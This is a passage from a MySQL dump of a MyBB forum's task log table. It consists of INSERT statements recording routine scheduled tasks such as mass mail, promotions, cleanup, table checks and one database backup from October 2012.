`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9453', '3', '1349969653', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9454', '9', '1349970177', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9455', '5', '1349970327', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9456', '9', '1349970974', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9457', '3', '1349971160', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9458', '1', '1349971207', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9459', '7', '1349971246', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9460', '5', '1349971539', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9461', '9', '1349972207', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9462', '5', '1349972788', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9463', '9', '1349972809', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9464', '3', '1349973025', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9465', '9', '1349973607', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9466', '5', '1349974033', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9467', '9', '1349975549', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9468', '3', '1349975600', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9469', '1', '1349975629', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9470', '7', '1349975767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9471', '5', '1349975774', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9472', '5', '1349976314', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9473', '9', '1349978540', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9474', '3', '1349978542', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9475', '5', '1349978546', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9476', '1', '1349978553', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9477', '7', '1349980094', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9478', '5', '1349980100', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9479', '9', '1349982008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9480', '3', '1349982010', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9481', '5', '1349982014', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9482', '1', '1349982041', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9483', '7', '1349982041', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9484', '5', '1349982419', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9485', '9', '1349982909', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9486', '5', '1349983543', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9487', '9', '1349983547', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9488', '3', '1349983982', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9489', '9', '1349984511', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9490', '5', '1349984805', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9491', '9', '1349985374', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9492', '3', '1349985560', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9493', '1', '1349985778', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9494', '7', '1349985786', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9495', '5', '1349985932', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9496', '9', '1349986303', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9497', '5', '1349987379', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9498', '9', '1349988951', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9499', '3', '1349989012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9500', '5', '1349989013', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9501', '3', '1349990117', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9502', '1', '1349990166', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9503', '7', '1349990177', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9504', '5', '1349990180', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9505', '9', '1349990265', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9506', '5', '1349990701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9507', '9', '1349990742', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9508', '3', '1349991057', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9509', '9', '1349991857', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9510', '5', '1349992017', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9511', '9', '1349992528', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9512', '3', '1349992744', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9513', '1', '1349992800', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9514', '7', '1349992813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9515', '5', '1349993425', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9516', '9', '1349993445', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9517', '5', '1349994846', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9518', '9', '1349996704', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9519', '3', '1349996715', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9520', '5', '1349996749', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9521', '1', '1349996764', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9522', '7', '1349996767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9523', '9', '1349997177', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9524', '5', '1349998208', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9525', '9', '1349998212', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9526', '3', '1349998215', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9527', '9', '1350000015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9528', '5', '1350001086', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9529', '3', '1350001178', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9530', '1', '1350001184', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9531', '2', '1350001233', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9532', '7', '1350001243', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9533', '11', '1350001308', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9534', '9', '1350001500', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9535', '5', '1350001960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9536', '3', '1350002037', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9537', '9', '1350002847', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9538', '5', '1350002850', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9539', '9', '1350003349', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9540', '3', '1350003580', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9541', '1', '1350003605', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9542', '7', '1350003613', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9543', '5', '1350003943', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9544', '9', '1350004335', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9545', '5', '1350005260', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9546', '9', '1350005358', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9547', '3', '1350005549', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9548', '9', '1350006471', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9549', '5', '1350006480', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9550', '9', '1350006907', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9551', '3', '1350007167', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9552', '1', '1350007293', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9553', '7', '1350007465', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9554', '5', '1350008009', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9555', '9', '1350008922', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9556', '5', '1350008938', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9557', '3', '1350009068', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9558', '9', '1350010405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9559', '5', '1350010412', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9560', '9', '1350010808', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9561', '3', '1350011516', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9562', '1', '1350011544', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9563', '7', '1350011552', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9564', '5', '1350011613', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9565', '9', '1350011630', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9566', '5', '1350012454', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9567', '9', '1350012520', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9568', '3', '1350012618', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9569', '9', '1350013304', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9570', '5', '1350013541', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9571', '9', '1350014104', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9572', '3', '1350014385', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9573', '1', '1350014404', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9574', '7', '1350014408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9575', '5', '1350014803', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9576', '9', '1350015097', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9577', '5', '1350015903', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9578', '9', '1350015916', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9579', '3', '1350016201', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9580', '9', '1350019063', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9581', '5', '1350019114', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9582', '3', '1350019118', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9583', '1', '1350019130', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9584', '7', '1350019151', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9585', '5', '1350025537', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9586', '9', '1350025559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9587', '3', '1350026032', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9588', '1', '1350026999', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9589', '7', '1350027006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9590', '9', '1350027312', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9591', '5', '1350027345', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9592', '3', '1350027638', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9593', '9', '1350027747', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9594', '5', '1350027935', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9595', '9', '1350028686', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9596', '3', '1350028964', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9597', '1', '1350028996', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9598', '7', '1350029853', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9599', '5', '1350029860', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9600', '9', '1350029964', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9601', '5', '1350030319', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9602', '9', '1350030337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9603', '3', '1350030962', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9604', '9', '1350031824', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9605', '5', '1350031829', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9606', '9', '1350032121', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9607', '3', '1350032351', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9608', '1', '1350032970', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9609', '7', '1350033099', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9610', '5', '1350033113', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9611', '9', '1350033428', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9612', '5', '1350034201', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9613', '9', '1350034213', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9614', '3', '1350034217', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9615', '9', '1350034979', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9616', '5', '1350035276', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9617', '9', '1350035716', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9618', '3', '1350035948', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9619', '1', '1350036039', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9620', '7', '1350036045', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9621', '5', '1350036302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9622', '9', '1350036617', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9623', '5', '1350037545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9624', '9', '1350037556', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9625', '3', '1350037837', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9626', '9', '1350038573', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9627', '5', '1350039182', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9628', '9', '1350040994', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9629', '3', '1350040998', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9630', '1', '1350041004', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9631', '7', '1350041008', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9632', '5', '1350041012', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9633', '5', '1350042052', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9634', '9', '1350042200', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9635', '3', '1350042250', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9636', '5', '1350042808', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9637', '9', '1350042914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9638', '3', '1350043250', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9639', '1', '1350043262', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9640', '4', '1350043264', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9641', '7', '1350043269', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9642', '5', '1350043524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9643', '9', '1350043970', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9644', '5', '1350045229', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9645', '9', '1350045638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9646', '3', '1350045789', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9647', '5', '1350046521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9648', '9', '1350046579', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9649', '3', '1350046855', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9650', '1', '1350048843', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9651', '7', '1350048991', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9652', '5', '1350051767', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9653', '9', '1350051775', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9654', '3', '1350052334', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9655', '1', '1350052339', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9656', '7', '1350052342', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('9657', '5', '1350053718', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` 